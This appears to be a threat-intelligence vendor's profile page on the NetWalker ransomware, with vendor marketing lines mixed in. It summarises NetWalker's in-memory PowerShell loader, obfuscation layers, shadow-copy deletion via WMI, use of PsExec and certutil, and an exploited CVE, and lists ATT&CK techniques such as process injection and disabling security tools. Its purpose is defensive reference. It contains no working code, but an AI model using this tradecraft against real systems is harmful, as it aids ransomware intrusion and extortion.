Netwalker
NetWalker is a ransomware family operated in ransomware-as-a-service contexts and associated in the provided content with Circus Spider. It encrypts files on infected Windows systems to extort victims and includes recovery-inhibition behavior, including deletion of Shadow Volumes/Volume Shadow Copies to prevent restoration. The malware has been described as written in PowerShell and executed directly in memory to avoid detection. Its PowerShell loader/script uses multiple layers of obfuscation, including Base64, hexadecimal encoding, XOR encryption, and obfuscated functions and variables; it can decode and decrypt these layers and load an embedded NetWalker DLL from hex format directly into memory. NetWalker also has defense-evasion capability, including detecting and terminating active security software-related processes, and it can add a registry entry under HKEY_CURRENT_USER\SOFTWARE{8 random characters}. Operators deploying NetWalker have used PsExec and certutil to retrieve the payload, and the malware can use WMI to delete Shadow Volumes. The content also links NetWalker campaigns to coronavirus-themed phishing lures, including attacks against hospitals in Spain, and states that NetWalker generally targeted hospitals in the U.S. and Spain. Additional reporting in the content notes NetWalker ransomware attacks exploiting CVE-2019-18935, alongside Blue Mockingbird activity, and references law-enforcement disruption including seizure of NetWalker leak/payment infrastructure in January 2021. The content further notes that UNC2628 was believed to partner with RaaS services including NetWalker, and that proceeds from NetWalker-linked ransomware activity were among funds received by the sanctioned exchange Garantex.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks... There were two malware campaigns associated with this vulnerability: Netwalker Ransomware and Blue Mockbird Monero Cryptocurrency-mining. | There were two malware campaigns associated with this vulnerability: • Netwalker Ransomware and • Blue Mockbird Monero Cryptocurrency-mining.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
UNC2628 is thought to partner with other RaaS services including REvil and Netwalker.
In a January 2021 thread on Exploit regarding the arrest of an affiliate for the NetWalker ransomware program and its subsequent demise, Wazawaka seems already resigned those limitations.
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniquesThe content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution. Blue Mockingbird has used batch script files to automate execution and deployment of payloads. During HomeLand Justice, threat actors used Windows batch files for persistence and execution.
Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request ... allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software ... and gain unauthorized access to the OS.
"Anchor can create and execute services to load its payload"; "APT32's backdoor has used Windows services as a way to execute its malicious payload"; "Ragnar Locker has used sc.exe to execute a service that it creates"; "Shamoon creates a new service named 'ntssrv' to execute the payload"
Persistence
1 techniquePrivilege Escalation
1 technique"APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection"; "IcedID has called ZwWriteVirtualMemory... ZwQueueApcThread... to inject itself into a remote process"; "Havoc can use NtAllocateVirtualMemory and NtCreateThreadEx to aid process injection"
Stealth
7 techniques"Action RAT's commands, strings, and domains can be Base64 encoded within the payload." / "ADVSTORESHELL... strings... encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed." / "APT29 has used encoded PowerShell commands." / "APT41 used VMProtected binaries..."
"APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection"; "IcedID has called ZwWriteVirtualMemory... ZwQueueApcThread... to inject itself into a remote process"; "Havoc can use NtAllocateVirtualMemory and NtCreateThreadEx to aid process injection"
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
“APT41 used certutil to download additional files.”; “Astaroth uses certutil and BITSAdmin to download additional malware.”; “CARROTBAT… download and execute a remote file via certutil.”; “Netwalker… used psexec and certutil to retrieve the Netwalker payload.”
"Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses," "Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk," and "Turla has also used PowerShell scripts to load and execute malware in memory."
Defense Impairment
1 techniqueDiscovery
2 techniquesThe content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
Lateral Movement
1 technique"PsExec ... can be used to execute binaries on remote systems using a temporary Windows service"; "RemoteCMD can execute commands remotely by creating a new service on the remote system"; "Winexe installs a service on the remote system, executes the command, then uninstalls the service"
Command and Control
1 techniqueImpact
3 techniquesThe data is held for ransom through encryption... operators continue to add new twists to their methods, from deleting backup systems simultaneously to encrypting the primary data set. | Ransomware is a type of malicious software designed to deny access to an information system or its resident data until a ransom is paid. The data is held for ransom through encryption...
Examples include 'Avaddon uses wmic.exe to delete shadow copies,' 'BlackCat can use wmic.exe to delete shadow copies on compromised networks,' and 'WannaCry utilizes wmic to delete shadow copies.'
Other
2 techniquesThe content repeatedly describes threat actors and malware disabling, stopping, uninstalling, or modifying antivirus, EDR, Windows Defender, AMSI, logging, and other security controls.
Examples include 'Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools', 'BlackByte disabled security tools such as Windows Defender', 'Scattered Spider has uninstalled and disabled security tools', and many malware families terminating AV/EDR processes or services.
Recent activity
48 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware family referenced as a source of illicit funds laundered through Garantex.
Ransomware family whose operators’ proceeds were laundered through the Garantex cryptocurrency exchange, per the article.
Ransomware variant explicitly cited as generating proceeds laundered through Garantex.
Ransomware that deletes shadow volumes to prevent recovery.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.